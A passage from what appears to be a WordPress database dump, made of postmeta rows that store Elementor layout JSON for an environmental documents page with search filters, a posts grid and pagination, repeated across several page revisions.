documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e994a25\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"20\",\"content_position\":\"middle\"},\"elements\":[{\"id\":\"9e95f9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.81400000000000005684341886080801486968994140625},\"elements\":[{\"id\":\"24db2ea\",\"elType\":\"widget\",\"settings\":{\"filter_id\":\"4062\",\"content_provider\":\"epro-posts\",\"apply_type\":\"ajax-ontyping\",\"typing_min_letters_count\":5,\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-search\"}],\"isInner\":true},{\"id\":\"82d0a07\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.186000000000007048583938740193843841552734375},\"elements\":[{\"id\":\"711091a\",\"elType\":\"widget\",\"settings\":{\"filter_id\":[\"4063\"],\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[{\"_id\":\"1ec2978\"}],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"filters_position\":\"inline-block\",\"filters_space_between_horizontal\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"checkbox_border_border\":\"solid\",\"checkbox_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"checkbox_border_color\":\"#00AA33\",\"checkbox_border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"show_label\":\"yes\",\"additional_providers_enabled\":\"\",\"filters_list_alignment\":\"left\",\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"custom_column_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"586692a\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"985f7d7\"}]},\"elements\":[{\"id\":\"ecb96e5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"add4b3d\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"query_id\":\"jet-smart-filters\",\"prev_text\":\"Prev\",\"next_text\":\"Next\",\"pages_center_offset\":5,\"pagination_items_bg_color_hover\":\"#0A3C11\",\"pagination_items_color_hover\":\"#FFFFFF\",\"pagination_items_bg_color_active\":\"#0A3C11\",\"pagination_items_color_active\":\"#FFFFFF\",\"pagination_items_border_border\":\"solid\",\"pagination_items_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"pagination_items_border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"pagination_items_alignment\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"jet-smart-filters-pagination\"}],\"isInner\":false}],\"isInner\":false}]'),(30164,4215,'_elementor_pro_version','3.3.6'),(30166,4216,'_elementor_edit_mode','builder'),(30167,4216,'_elementor_template_type','wp-page'),(30168,4216,'_elementor_version','3.4.1'),(30169,4216,'_wp_page_template','default'),(30170,4216,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e994a25\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"20\",\"content_position\":\"middle\"},\"elements\":[{\"id\":\"9e95f9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.81400000000000005684341886080801486968994140625},\"elements\":[{\"id\":\"24db2ea\",\"elType\":\"widget\",\"settings\":{\"filter_id\":\"4062\",\"content_provider\":\"epro-posts\",\"apply_type\":\"ajax-ontyping\",\"typing_min_letters_count\":5,\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-search\"}],\"isInner\":true},{\"id\":\"82d0a07\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.186000000000007048583938740193843841552734375},\"elements\":[{\"id\":\"711091a\",\"elType\":\"widget\",\"settings\":{\"filter_id\":[\"4063\"],\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[{\"_id\":\"1ec2978\"}],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"filters_position\":\"inline-block\",\"filters_space_between_horizontal\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"checkbox_border_border\":\"solid\",\"checkbox_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"checkbox_border_color\":\"#00AA33\",\"checkbox_border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"show_label\":\"yes\",\"additional_providers_enabled\":\"\",\"filters_list_alignment\":\"left\",\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"custom_column_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"586692a\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"985f7d7\"}]},\"elements\":[{\"id\":\"ecb96e5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"add4b3d\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"query_id\":\"jet-smart-filters\",\"prev_text\":\"Prev\",\"next_text\":\"Next\",\"pages_center_offset\":5,\"pagination_items_bg_color_hover\":\"#0A3C11\",\"pagination_items_color_hover\":\"#FFFFFF\",\"pagination_items_bg_color_active\":\"#0A3C11\",\"pagination_items_color_active\":\"#FFFFFF\",\"pagination_items_border_border\":\"solid\",\"pagination_items_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"pagination_items_border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"pagination_items_alignment\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"jet-smart-filters-pagination\"}],\"isInner\":false}],\"isInner\":false}]'),(30172,4216,'_elementor_pro_version','3.3.6'),(30174,4217,'_elementor_edit_mode','builder'),(30175,4217,'_elementor_template_type','wp-page'),(30176,4217,'_elementor_version','3.4.1'),(30177,4217,'_wp_page_template','default'),(30178,4217,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e994a25\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"20\",\"content_position\":\"middle\"},\"elements\":[{\"id\":\"9e95f9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.81400000000000005684341886080801486968994140625},\"elements\":[{\"id\":\"24db2ea\",\"elType\":\"widget\",\"settings\":{\"filter_id\":\"4062\",\"content_provider\":\"epro-posts\",\"apply_type\":\"ajax-ontyping\",\"typing_min_letters_count\":5,\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-search\"}],\"isInner\":true},{\"id\":\"82d0a07\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.186000000000007048583938740193843841552734375},\"elements\":[{\"id\":\"711091a\",\"elType\":\"widget\",\"settings\":{\"filter_id\":[\"4063\"],\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[{\"_id\":\"1ec2978\"}],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"filters_position\":\"inline-block\",\"filters_space_between_horizontal\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"checkbox_border_border\":\"solid\",\"checkbox_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"checkbox_border_color\":\"#00AA33\",\"checkbox_border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"show_label\":\"yes\",\"additional_providers_enabled\":\"\",\"filters_list_alignment\":\"left\",\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"custom_column_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7db54a\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a1c54ac\"}],\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"6764de0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0d13439\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"prev_text\":\"Prev\",\"next_text\":\"Next\",\"pages_center_offset\":5,\"pagination_items_bg_color_hover\":\"#0A3C11\",\"pagination_items_color_hover\":\"#FFFFFF\",\"pagination_items_vertical_gap\":{\"unit\":\"px\",\"size\":27,\"sizes\":[]},\"pagination_items_border_border\":\"solid\",\"pagination_items_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"pagination_items_border_color\":\"#0A3C11\",\"pagination_items_border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"pagination_items_alignment\":\"center\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-pagination\"}],\"isInner\":false}],\"isInner\":false}]'),(30180,4217,'_elementor_pro_version','3.3.6'),(30184,4218,'_elementor_edit_mode','builder'),(30185,4218,'_elementor_template_type','wp-page'),(30186,4218,'_elementor_version','3.4.1'),(30187,4218,'_wp_page_template','default'),(30188,4218,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e994a25\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"20\",\"content_position\":\"middle\"},\"elements\":[{\"id\":\"9e95f9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.81400000000000005684341886080801486968994140625},\"elements\":[{\"id\":\"24db2ea\",\"elType\":\"widget\",\"settings\":{\"filter_id\":\"4062\",\"content_provider\":\"epro-posts\",\"apply_type\":\"ajax-ontyping\",\"typing_min_letters_count\":5,\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-search\"}],\"isInner\":true},{\"id\":\"82d0a07\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.186000000000007048583938740193843841552734375},\"elements\":[{\"id\":\"711091a\",\"elType\":\"widget\",\"settings\":{\"filter_id\":[\"4063\"],\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[{\"_id\":\"1ec2978\"}],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"filters_position\":\"inline-block\",\"filters_space_between_horizontal\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"checkbox_border_border\":\"solid\",\"checkbox_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"checkbox_border_color\":\"#00AA33\",\"checkbox_border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"show_label\":\"yes\",\"additional_providers_enabled\":\"\",\"filters_list_alignment\":\"left\",\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"custom_column_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7db54a\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a1c54ac\"}],\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"6764de0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0d13439\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"prev_text\":\"Prev\",\"next_text\":\"Next\",\"pages_center_offset\":5,\"pagination_items_bg_color_hover\":\"#0A3C11\",\"pagination_items_color_hover\":\"#FFFFFF\",\"pagination_items_vertical_gap\":{\"unit\":\"px\",\"size\":27,\"sizes\":[]},\"pagination_items_border_border\":\"solid\",\"pagination_items_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"pagination_items_border_color\":\"#0A3C11\",\"pagination_items_border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"pagination_items_alignment\":\"center\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-pagination\"}],\"isInner\":false}],\"isInner\":false}]'),(38591,4054,'_elementor_css','a:6:{s:4:\"time\";i:1770854872;s:5:\"fonts\";a:1:{i:0;s:6:\"Roboto\";}s:5:\"icons\";a:1:{i:0;s:10:\"fa-regular\";}s:20:\"dynamic_elements_ids\";a:28:{i:0;s:7:\"c51cdd1\";i:1;s:7:\"db4478e\";i:2;s:7:\"db4478e\";i:3;s:7:\"db4478e\";i:4;s:7:\"db4478e\";i:5;s:7:\"9d5c93f\";i:6;s:7:\"b93d6bc\";i:7;s:7:\"c51cdd1\";i:8;s:7:\"db4478e\";i:9;s:7:\"db4478e\";i:10;s:7:\"db4478e\";i:11;s:7:\"db4478e\";i:12;s:7:\"9d5c93f\";i:13;s:7:\"b93d6bc\";i:14;s:7:\"c51cdd1\";i:15;s:7:\"db4478e\";i:16;s:7:\"db4478e\";i:17;s:7:\"db4478e\";i:18;s:7:\"db4478e\";i:19;s:7:\"9d5c93f\";i:20;s:7:\"b93d6bc\";i:21;s:7:\"c51cdd1\";i:22;s:7:\"db4478e\";i:23;s:7:\"db4478e\";i:24;s:7:\"db4478e\";i:25;s:7:\"db4478e\";i:26;s:7:\"9d5c93f\";i:27;s:7:\"b93d6bc\";}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(30190,4218,'_elementor_pro_version','3.3.6'),(30192,4219,'_elementor_edit_mode','builder'),(30193,4219,'_elementor_template_type','wp-page'),(30194,4219,'_elementor_version','3.4.1'),(30195,4219,'_wp_page_template','default'),(30196,4219,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related 